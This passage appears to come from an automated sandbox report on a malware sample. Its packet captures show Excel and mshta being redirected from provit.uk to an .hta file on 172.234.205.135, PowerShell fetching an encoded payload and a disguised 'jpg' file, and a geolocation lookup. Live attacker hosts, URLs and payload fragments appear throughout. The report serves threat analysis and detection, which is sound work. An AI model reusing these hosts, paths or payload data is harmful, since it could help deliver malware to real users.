                                                                                                                                                                                Nov 25, 2024 14:07:21.062067032 CET1236INData Raw: 44 6a 39 77 49 50 4d 75 44 6a 36 77 59 4f 4d 69 44 6a 33 77 6f 4e 4d 57 44 6a 30 77 34 4d 41 41 41 41 71 41 4d 41 63 41 55 44 47 78 41 42 4d 59 43 54 68 41 41 41 41 51 41 77 41 67 42 51 50 73 33 44 36 39 51 65 50 67 33 7a 32 39 59 5a 50 41 31 44
                                                                                                                                                                                Data Ascii: Dj9wIPMuDj6wYOMiDj3woNMWDj0w4MAAAAqAMAcAUDGxABMYCThAAAAQAwAgBQPs3D69QePg3z29YZPA1DP9gTP00zL9gCPxvzQ7UzOXsDB4wGOohDZ4AGObhjF3A8N8eDu3Q7NveDq3EXNDXTt1cZNESz30wLNbSTl0UINcRzMzYrMmLzbysiMeIzFyEhMLEj+x8dMXHTyxMcM7GjpxkZMJGTexYWMgFjUxgTMVAj7wgNMSDDx


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                5192.168.2.2249176178.237.33.50803984C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:07:27.246915102 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                Host: geoplugin.net
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 25, 2024 14:07:28.439371109 CET1170INHTTP/1.1 200 OK
                                                                                                                                                                                date: Mon, 25 Nov 2024 13:07:28 GMT
                                                                                                                                                                                server: Apache
                                                                                                                                                                                content-length: 962
                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                cache-control: public, max-age=300
                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                                                                                Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                6192.168.2.2249177172.234.205.135803964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:07:34.204668045 CET80OUTGET /1244/SRVRSR.txt HTTP/1.1
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 25, 2024 14:07:35.375935078 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:07:35 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:37:43 GMT
                                                                                                                                                                                ETag: "a0800-627bb293020f5"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 657408
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                                                                                                Nov 25, 2024 14:07:35.376003027 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                                                                                                Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                                                                                                                                Nov 25, 2024 14:07:35.376089096 CET1236INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                                                                                                                                Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                                                                                                                                Nov 25, 2024 14:07:35.376126051 CET1236INData Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
                                                                                                                                                                                Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
                                                                                                                                                                                Nov 25, 2024 14:07:35.376162052 CET1236INData Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
                                                                                                                                                                                Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
                                                                                                                                                                                Nov 25, 2024 14:07:35.376226902 CET1236INData Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
                                                                                                                                                                                Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
                                                                                                                                                                                Nov 25, 2024 14:07:35.376279116 CET1236INData Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
                                                                                                                                                                                Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
                                                                                                                                                                                Nov 25, 2024 14:07:35.376316071 CET1236INData Raw: 51 64 4f 47 6e 44 70 35 38 5a 4f 61 6d 6a 68 35 73 58 4f 6d 6c 54 57 35 34 55 4f 66 6b 54 41 34 77 50 4f 33 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36
                                                                                                                                                                                Data Ascii: QdOGnDp58ZOamjh5sXOmlTW54UOfkTA4wPO3jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8M
                                                                                                                                                                                Nov 25, 2024 14:07:35.376349926 CET1236INData Raw: 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44
                                                                                                                                                                                Data Ascii: UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDp
                                                                                                                                                                                Nov 25, 2024 14:07:35.376386881 CET1236INData Raw: 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43
                                                                                                                                                                                Data Ascii: gNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuP
                                                                                                                                                                                Nov 25, 2024 14:07:35.497065067 CET1236INData Raw: 69 6a 66 41 41 41 41 73 41 77 41 67 41 77 50 45 2f 7a 72 2f 6f 35 50 2f 51 6a 68 30 41 45 41 41 41 41 46 41 4d 41 45 41 4d 54 30 7a 51 4d 41 41 41 41 44 41 4d 41 41 41 38 54 39 2f 38 39 50 4a 2f 7a 6d 41 41 41 41 51 41 67 41 77 44 41 41 41 49 7a
                                                                                                                                                                                Data Ascii: ijfAAAAsAwAgAwPE/zr/o5P/Qjh0AEAAAAFAMAEAMT0zQMAAAADAMAAA8T9/89PJ/zmAAAAQAgAwDAAAIzAxQfMjHTxxYLAAAAFAIA4AAAA5IUOhkzD5AAOaDAAAQBACAMA1wAN+Tz70UOAAAAEAIAsAwjS84DPgsz+7Q+ODCAAAQBACAKAAAAOdhzU4MxNKYz+2AvNlbj220sN5aTqAAAAgAgAACgP45Dd+AnPs5Da+QmPg5DX


                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.2249161198.244.140.414433356C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:06:35 UTC403OUTGET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: provit.uk
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:06:35 UTC452INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Length: 104
                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:35 GMT
                                                                                                                                                                                Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                X-Dns-Prefetch-Control: off
                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Xss-Protection: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2024-11-25 13:06:35 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 34 2e 32 30 35 2e 31 33 35 2f 31 32 34 34 2f 73 65 63 73 2f 6e 69 63 65 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 68 69 63 68 67 6f 73 6f 66 61 72 67 6f 6f 64 66 6f 72 65 65 72 79 62 6f 64 79 2e 68 74 61
                                                                                                                                                                                Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.2249163198.244.140.414433652C:\Windows\System32\mshta.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:06:40 UTC427OUTGET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: provit.uk
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:06:40 UTC452INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Length: 104
                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:40 GMT
                                                                                                                                                                                Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                X-Dns-Prefetch-Control: off
                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Xss-Protection: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2024-11-25 13:06:40 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 34 2e 32 30 35 2e 31 33 35 2f 31 32 34 34 2f 73 65 63 73 2f 6e 69 63 65 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 68 69 63 68 67 6f 73 6f 66 61 72 67 6f 6f 64 66 6f 72 65 65 72 79 62 6f 64 79 2e 68 74 61
                                                                                                                                                                                Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.2249166198.244.140.414433356C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:06:56 UTC403OUTGET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: provit.uk
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:06:56 UTC452INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Length: 104
                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:56 GMT
                                                                                                                                                                                Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                X-Dns-Prefetch-Control: off
                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Xss-Protection: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2024-11-25 13:06:56 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 34 2e 32 30 35 2e 31 33 35 2f 31 32 34 34 2f 73 65 63 73 2f 6e 69 63 65 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 68 69 63 68 67 6f 73 6f 66 61 72 67 6f 6f 64 66 6f 72 65 65 72 79 62 6f 64 79 2e 68 74 61
                                                                                                                                                                                Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.2249170198.244.140.414433060C:\Windows\System32\mshta.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:07:00 UTC427OUTGET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: provit.uk
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:07:01 UTC452INHTTP/1.1 302 Found
                                                                                                                                                                                Content-Length: 104
                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:07:00 GMT
                                                                                                                                                                                Location: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                X-Dns-Prefetch-Control: off
                                                                                                                                                                                X-Download-Options: noopen
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                X-Xss-Protection: 0
                                                                                                                                                                                Connection: close
                                                                                                                                                                                2024-11-25 13:07:01 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 34 2e 32 30 35 2e 31 33 35 2f 31 32 34 34 2f 73 65 63 73 2f 6e 69 63 65 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 68 69 63 68 67 6f 73 6f 66 61 72 67 6f 6f 64 66 6f 72 65 65 72 79 62 6f 64 79 2e 68 74 61
                                                                                                                                                                                Data Ascii: Found. Redirecting to http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.2249168193.30.119.2054432116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-11-25 13:07:00 UTC211OUTGET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                                                                                                                                Host: 3105.filemail.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2024-11-25 13:07:01 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                Content-Length: 2230233
                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                                                                                                                                X-Transfer-ID: ibybhsntnwgamsn
                                                                                                                                                                                Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:59 GMT
                                                                                                                                                                                Connection: close
